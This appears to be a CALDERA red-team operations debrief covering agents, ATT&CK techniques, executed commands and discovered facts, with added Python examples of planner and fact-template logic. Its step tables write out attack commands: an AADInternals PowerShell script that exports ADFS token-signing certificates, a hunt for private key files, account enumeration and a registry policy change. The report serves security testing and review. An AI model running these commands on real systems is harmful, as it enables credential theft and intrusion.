
OPERATIONS DEBRIEF

Generated on 2023-04-25T13:16:32Z

This document covers the overall campaign analytics for the selected set of operations. The
sections below contain general metadata about the selected operations, graphical views of the
operations, the techniques and tactics used, and the facts discovered by the operations. The
sections that follow give a more in-depth review of each specific operation run.

STATISTICS
An operation's planner is its decision-making process: the logic that decides which abilities a
running operation should use and in what order. An objective is a collection of fact targets,
called goals, and can be tied to an adversary. Each time the planner is evaluated, the objective's
status is re-evaluated against the facts the operation currently knows, and the operation
completes once every goal is met.

Name                                       State         Planner  Objective  Time
windows - discovery                        finished      atomic   default    2023-04-25T13:13:19Z
asdasdasd (25/4/2023, 10:08:32)            finished      atomic   default    2023-04-25T13:09:48Z
windows - discovery (25/4/2023, 10:13:12)  run_one_link  atomic   default    Not finished
windows - discovery (25/4/2023, 10:14:07)  running       atomic   default    Not finished
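As an added illustration of the planner and objective description above (this is not CALDERA's own planner code), the following Python models the evaluation loop: goals are fact targets with an operator and a required count, the objective is re-checked after every round of collected facts, and the operation is considered complete as soon as every goal is satisfied. The Goal fields, the operator set (including "*" for any value) and the sample rounds are assumptions made for this example; the rounds are modelled loosely on the asdasdasd operation in this debrief.

```python
"""Added example, not CALDERA's own planner: evaluate an objective (a set of
fact-target goals) against the facts an operation has collected so far and
stop the operation once every goal is met.

Assumptions for this example: a goal names a trait, a comparison operator,
a value and how many distinct matching facts it needs; "*" matches any value."""
from dataclasses import dataclass
import operator

OPERATORS = {
    "==": operator.eq,
    "!=": operator.ne,
    "in": lambda fact_value, wanted: wanted in fact_value,
    "*": lambda fact_value, wanted: True,
}


@dataclass(frozen=True)
class Fact:
    trait: str
    value: str
    score: int = 1          # 0 means blacklisted: never counts toward a goal


@dataclass(frozen=True)
class Goal:
    target: str             # trait the goal is about, e.g. "host.user.name"
    value: str = ""         # value to compare against (ignored for "*")
    count: int = 1          # distinct matching fact values required
    op: str = "=="

    def satisfied_by(self, facts):
        compare = OPERATORS[self.op]
        matches = {f.value for f in facts
                   if f.trait == self.target and f.score > 0 and compare(f.value, self.value)}
        return len(matches) >= self.count


@dataclass(frozen=True)
class Objective:
    name: str
    goals: tuple

    def status(self, facts):
        """Return (complete, per-goal result) for the planner to act on."""
        per_goal = {f"{g.target} {g.op} {g.value!r} x{g.count}": g.satisfied_by(facts)
                    for g in self.goals}
        return all(per_goal.values()), per_goal


def run_planner(objective, batches):
    """Simulate planner rounds: each batch is the set of facts one round of
    links reported back. Returns (round in which the objective was met, or
    None if it never was, and the facts known at the end)."""
    known = set()
    by_name = lambda f: (f.trait, f.value)
    for round_no, batch in enumerate(batches, start=1):
        known |= set(batch)
        complete, _ = objective.status(known)
        if complete:
            return round_no, sorted(known, key=by_name)
    return None, sorted(known, key=by_name)


# Constructed sample rounds, modelled on the asdasdasd operation in this debrief:
# round 1 is what "whoami" reported, round 2 what the /etc/passwd listing reported.
ROUND_WHOAMI = {Fact("host.user.name", "root"), Fact("domain.user.name", "root")}
ROUND_PASSWD = {Fact("host.user.name", v) for v in ("root", "daemon", "bin", "sys", "upa")}

DEFAULT_OBJECTIVE = Objective("default", (Goal("host.user.name", "root"),))
FIVE_USERS = Objective("five-users", (Goal("host.user.name", count=5, op="*"),))
BLACKLISTED_URL = Objective("url", (Goal("server.malicious.url", "keyloggedsite.com"),))

if __name__ == "__main__":
    print(run_planner(DEFAULT_OBJECTIVE, [ROUND_WHOAMI, ROUND_PASSWD])[0])   # 1
    print(run_planner(FIVE_USERS, [ROUND_WHOAMI, ROUND_PASSWD])[0])          # 2
    print(run_planner(BLACKLISTED_URL,
                      [{Fact("server.malicious.url", "keyloggedsite.com", 0)}])[0])  # None
```

The blacklisted case is the one worth keeping in mind when reading the fact tables later in this debrief: a fact with score 0 is present in the knowledge base but contributes nothing to goal evaluation or to filling ability variables.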

AGENTS
The table below displays information about the agents used. An agent's paw is the unique identifier, or
paw print, of an agent. Also included are the username of the user who executed the agent, the
privilege level of the agent process, and the name of the agent executable.

Paw     Host             Platform  Username                       Privilege  Executable
zzmkxe  upa              linux     root                           Elevated   red-team
hcaska  ubuntu-16        linux     root                           Elevated   sandcat.go-linux
ltlyuu  WIN-1RE7BLRQC2T  windows   WIN-1RE7BLRQC2T\Administrador  User       wserver2008.exe
mwdxiu  upa              linux     upa                            User       blue-agent
uldkmv  upa              linux     root                           Elevated   sandcat.go-linux
ecamvk  upa              linux     root                           Elevated   sandcat.go-linux
znhgow  WIN-1RE7BLRQC2T  windows   WIN-1RE7BLRQC2T\Administrador  Elevated   blueSRV2008.exe

ATTACK PATH GRAPH

This graph displays the attack path of hosts compromised by CALDERA. Source and target hosts are
connected by the method of execution used to start the agent on the target host.

[Graph not reproduced in this rendering. Legend: server, linux, windows. Nodes (host$username):
C2 Server; upa$root (three agents); upa$upa; ubuntu-16$root;
WIN-1RE7BLRQC2T$WIN-1RE7BLRQC2T\Administrador (two agents).]

STEPS GRAPH
This is a graphical display of the agents connected to the command and control (C2), the operations
run, and the steps of each operation as they relate to the agents.

[Graph not reproduced in this rendering. Legend: server, linux, windows, operation. Agent nodes:
C2 Server; ubuntu-16$root; upa$root; upa$upa; WIN-1RE7BLRQC2T$WIN-1RE7BLRQC2T\Administrador.
Operation nodes: windows - discovery; windows - discovery (25/4/2023, 10:13:12);
windows - discovery (25/4/2023, 10:14:07); asdasdasd (25/4/2023, 10:08:32). Step nodes are
labelled by tactic: discovery, defense-evasion, credential-access, execution.]

TACTIC GRAPH
This graph displays the order of tactics executed by each operation. A tactic explains the general
purpose or the "why" of a step.

[Graph not reproduced in this rendering. Legend: operation. Operation nodes: windows - discovery;
windows - discovery (25/4/2023, 10:13:12); windows - discovery (25/4/2023, 10:14:07);
asdasdasd (25/4/2023, 10:08:32). Tactic nodes: discovery, defense-evasion, credential-access,
execution. The per-operation mapping is given in the Tactics and Techniques table.]

TECHNIQUE GRAPH
This graph displays the order of techniques executed by each operation. A technique explains the
technical method or the "how" of a step.

[Graph not reproduced in this rendering. Legend: operation, technique_name. Technique nodes:
Modify Registry; Account Discovery: Local Account; System Owner/User Discovery; Unsecured
Credentials: Private Keys; Account Discovery: Domain Account; Virtualization/Sandbox Evasion:
Time Based Evasion; Command and Scripting Interpreter: PowerShell. Operation nodes:
windows - discovery; windows - discovery (25/4/2023, 10:13:12);
windows - discovery (25/4/2023, 10:14:07); asdasdasd (25/4/2023, 10:08:32).]

FACT GRAPH
This graph displays the facts discovered by the operations run. Facts are attached to the operation
where they were discovered and to the facts that led to their discovery. For readability, only the
first 15 facts discovered in an operation are included in the graph.

[Graph not reproduced in this rendering. Legend: operation, fact. Counts shown by trait:
12 file.sensitive.extension, 4 server.malicious.url, 51 host.user.name, 1 domain.user.name.
Operation nodes: asdasdasd (25/4/2023, 10:08:32); windows - discovery;
windows - discovery (25/4/2023, 10:13:12); windows - discovery (25/4/2023, 10:14:07).]
TACTICS AND TECHNIQUES

Tactic, technique, and the abilities used under each technique, grouped by operation:

Credential-access
  T1552.004: Unsecured Credentials: Private Keys
    windows - discovery: ADFS token signing and encryption certificates theft - Remote;
    Private Keys

Defense-evasion
  T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion
    windows - discovery: 1-min sleep
  T1112: Modify Registry
    windows - discovery (25/4/2023, 10:13:12): Activate Windows NoFileMenu Group Policy Feature

Discovery
  T1087.002: Account Discovery: Domain Account
    windows - discovery: Account Discovery (targeted)
  T1033: System Owner/User Discovery
    asdasdasd (25/4/2023, 10:08:32): Identify active user
  T1087.001: Account Discovery: Local Account
    asdasdasd (25/4/2023, 10:08:32): Find local users

Execution
  T1059.001: Command and Scripting Interpreter: PowerShell
    windows - discovery: ATHPowerShellCommandLineParameter -Command parameter variations


STEPS IN OPERATION WINDOWS - DISCOVERY

The table below shows detailed information about the steps taken in an operation and whether the
command run discovered any facts. Each step is listed with its Time, Status, Agent, Name, Command
and Facts columns.

Step: 1-min sleep
  Time: (blank)   Status: collected   Agent: ltlyuu   Facts: No
  Command: sleep 60

Step: ADFS token signing and encryption certificates theft - Remote
  Time: (blank)   Status: collected   Agent: ltlyuu   Facts: No
  Command (a single PowerShell line, wrapped here at statement separators):
    Import-Module ActiveDirectory -Force ;
    Import-Module AADInternals -Force | Out-Null;
    $dcServerName = (Get-ADDomainController).HostName;
    $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}";
    $PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force;
    $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList;
    $hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex;
    $ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server;
    $Configuration = [xml]$ADFSConfig;
    $group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group;
    $container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName;
    $parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn;
    $base = "LDAP://CN=$group,$container,$parent";
    $ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base));
    $ADSearch.Filter = '(name=CryptoPolicy)';
    $ADSearch.PropertiesToLoad.Clear();
    $ADSearch.PropertiesToLoad.Add("displayName") | Out-Null;
    $aduser = $ADSearch.FindOne();
    $keyObjectGuid = $ADUser.Properties["displayName"] ;
    $ADSearch.PropertiesToLoad.Clear();
    $ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null;
    $ADSearch.Filter="(l=$keyObjectGuid)";
    $aduser=$ADSearch.FindOne() ;
    $key=[byte[]]$aduser.Properties["thumbnailphoto"][0] ;
    Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key;
    Get-ChildItem | Where-Object {$_ -like "ADFS*"};
    Write-Host "`nCertificates retrieved successfully"

Step: Account Discovery (targeted)
  Time: (blank)   Status: collected   Agent: ltlyuu   Facts: No
  Command: net user #{domain.user.name} /domain

Step: ATHPowerShellCommandLineParameter -Command parameter variations
  Time: (blank)   Status: collected   Agent: ltlyuu   Facts: No
  Command: $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable; if (-not $RequiredModule) {Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force}; ; Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop

Step: Private Keys
  Time: (blank)   Status: collected   Agent: ltlyuu   Facts: No
  Command: dir c:\ /b /s .key | findstr /e .key

None of these five steps records an execution time or any facts. As rendered in this report, the
ADFS command still contains the unresolved placeholders #{adfs_service_account_name} and
#{replication_password}, and its -ArgumentList and -Server parameters appear without arguments;
agent ltlyuu is listed in the Agents table with User (non-elevated) privilege.

STEPS IN OPERATION ASDASDASD (25/4/2023, 10:08:32)

Time                  Status   Agent   Name                  Command                                              Facts
2023-04-25T13:08:48Z  success  uldkmv  Identify active user  whoami                                               Yes
2023-04-25T13:08:39Z  success  ecamvk  Identify active user  whoami                                               Yes
2023-04-25T13:09:44Z  success  uldkmv  Find local users      cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'  Yes
2023-04-25T13:09:40Z  success  ecamvk  Find local users      cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'  Yes

Note that the Find local users filter drops every account name containing an underscore (the _apt
account on Debian-based systems, for instance), so the host.user.name facts it produces are not a
complete account inventory of the host.

STEPS IN OPERATION WINDOWS - DISCOVERY (25/4/2023, 10:13:12)

Step: Activate Windows NoFileMenu Group Policy Feature
  Time: (blank)   Status: collected   Agent: ltlyuu   Facts: No
  Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f


STEPS IN OPERATION WINDOWS - DISCOVERY (25/4/2023, 10:14:07)

Time  Status  Agent  Name  Command  Facts
(no steps are listed for this operation; the Statistics table shows it as still running)

FACTS FOUND IN OPERATION WINDOWS - DISCOVERY


The table below lists the facts found in the operation, the command that produced each fact and
the agent that found it. Every fact gets a score of 1 by default. If a fact such as a
host.user.password is important or has a high chance of success when used, it may be assigned a
score of 5. When an ability uses a fact to fill in a variable, the facts with the highest scores
are used first. A fact with a score of 0 is blacklisted, meaning it cannot be used in an operation.

Trait                     Value              Score  Source    Command Run
file.sensitive.extension  wav                1      ed3..96b  No Command (SEEDED)
file.sensitive.extension  yml                1      ed3..96b  No Command (SEEDED)
file.sensitive.extension  png                1      ed3..96b  No Command (SEEDED)
server.malicious.url      keyloggedsite.com  1      ed3..96b  No Command (SEEDED)
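The following Python is an added example, not CALDERA's own templating code, showing how the fact-scoring rules described above play out when an ability command such as the Account Discovery (targeted) step's `net user #{domain.user.name} /domain` is expanded from collected facts: the highest-scoring fact is used first, a score-0 fact is never used, and a template whose variable has no usable fact yields no runnable command at all. The shell-metacharacter filter and the sample scores are this example's own assumptions, not behaviour the debrief describes.

```python
"""Added example, not CALDERA's own templating code: expand the #{trait}
variables of an ability command from collected facts, best score first,
never using a blacklisted (score 0) fact. The metacharacter filter is this
example's own precaution, not behaviour the debrief describes."""
import re
from dataclasses import dataclass
from itertools import product

VARIABLE = re.compile(r"#\{([A-Za-z0-9_.]+)\}")
# Fact values are spliced into a command line verbatim, so a value collected
# on one host could inject into a command run on another. Assumed policy here:
# refuse values that could break out of the intended argument.
UNSAFE = re.compile(r"[;&|`$<>\n\r\"']")


@dataclass(frozen=True)
class Fact:
    trait: str
    value: str
    score: int = 1


def usable_facts(facts, trait):
    """Facts for one trait, highest score first, dropping blacklisted and unsafe values."""
    keep = [f for f in facts
            if f.trait == trait and f.score > 0 and not UNSAFE.search(f.value)]
    return sorted(keep, key=lambda f: f.score, reverse=True)


def fill_template(command, facts):
    """Return every resolved (command, facts_used) pair, best total score first.
    If some variable has no usable fact the command cannot run: return []."""
    traits = list(dict.fromkeys(VARIABLE.findall(command)))  # unique, in order
    if not traits:
        return [(command, ())]
    choices = []
    for trait in traits:
        candidates = usable_facts(facts, trait)
        if not candidates:
            return []
        choices.append(candidates)
    resolved = []
    for combo in product(*choices):
        cmd = command
        for fact in combo:
            cmd = cmd.replace("#{%s}" % fact.trait, fact.value)
        resolved.append((cmd, combo))
    resolved.sort(key=lambda pair: sum(f.score for f in pair[1]), reverse=True)
    return resolved


# Constructed sample facts; the scores are illustrative and not from the debrief.
SAMPLE_FACTS = [
    Fact("domain.user.name", "root", 1),
    Fact("domain.user.name", "svc_adfs", 5),      # operator-boosted, used first
    Fact("domain.user.name", "guest", 0),         # blacklisted, never used
    Fact("domain.user.name", "x; whoami", 9),     # hostile value, never substituted
    Fact("host.user.name", "root", 1),
]
ACCOUNT_DISCOVERY = "net user #{domain.user.name} /domain"
ADFS_THEFT = 'Where-Object name -eq "#{adfs_service_account_name}"'

if __name__ == "__main__":
    for cmd, used in fill_template(ACCOUNT_DISCOVERY, SAMPLE_FACTS):
        print(cmd, "<-", [f.value for f in used])
    print(fill_template(ADFS_THEFT, SAMPLE_FACTS))   # []: no fact for that trait
```

The empty result for the ADFS template mirrors what this debrief shows for that step: with no fact supplying #{adfs_service_account_name}, the placeholder stays in the command and nothing useful can run.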

FACTS FOUND IN OPERATION ASDASDASD (25/4/2023, 10:08:32)

Trait                     Value              Score  Source          Command Run
file.sensitive.extension  wav                1      ed3..96b        No Command (SEEDED)
file.sensitive.extension  yml                1      ed3..96b        No Command (SEEDED)
file.sensitive.extension  png                1      ed3..96b        No Command (SEEDED)
server.malicious.url      keyloggedsite.com  1      ed3..96b        No Command (SEEDED)
host.user.name            root               1      ecamvk, uldkmv  whoami
                                                                    cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'
domain.user.name          root               1      ecamvk, uldkmv  whoami
host.user.name            (50 values below)  1      ecamvk, uldkmv  cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'

The remaining 50 host.user.name values, each with score 1, sources ecamvk and uldkmv, and the same
cut/grep command, are: daemon, bin, sys, sync, games, man, lp, mail, news, uucp, proxy, www-data,
backup, list, irc, gnats, nobody, systemd-network, systemd-resolve, systemd-timesync, messagebus,
syslog, tss, uuidd, tcpdump, landscape, pollinate, usbmux, sshd, systemd-coredump, upa, lxd,
fwupd-refresh, rtkit, kernoops, lightdm, whoopsie, dnsmasq, avahi-autoipd, avahi, cups-pk-helper,
nm-openvpn, pulse, speech-dispatcher, geoclue, saned, hplip, colord, gnome-initial-setup, gdm.

FACTS FOUND IN OPERATION WINDOWS - DISCOVERY (25/4/2023, 10:13:12)

Trait                     Value              Score  Source    Command Run
file.sensitive.extension  wav                1      ed3..96b  No Command (SEEDED)
file.sensitive.extension  yml                1      ed3..96b  No Command (SEEDED)
file.sensitive.extension  png                1      ed3..96b  No Command (SEEDED)
server.malicious.url      keyloggedsite.com  1      ed3..96b  No Command (SEEDED)


FACTS FOUND IN OPERATION WINDOWS - DISCOVERY (25/4/2023, 10:14:07)

Trait                     Value              Score  Source    Command Run
file.sensitive.extension  wav                1      ed3..96b  No Command (SEEDED)
file.sensitive.extension  yml                1      ed3..96b  No Command (SEEDED)
file.sensitive.extension  png                1      ed3..96b  No Command (SEEDED)
server.malicious.url      keyloggedsite.com  1      ed3..96b  No Command (SEEDED)
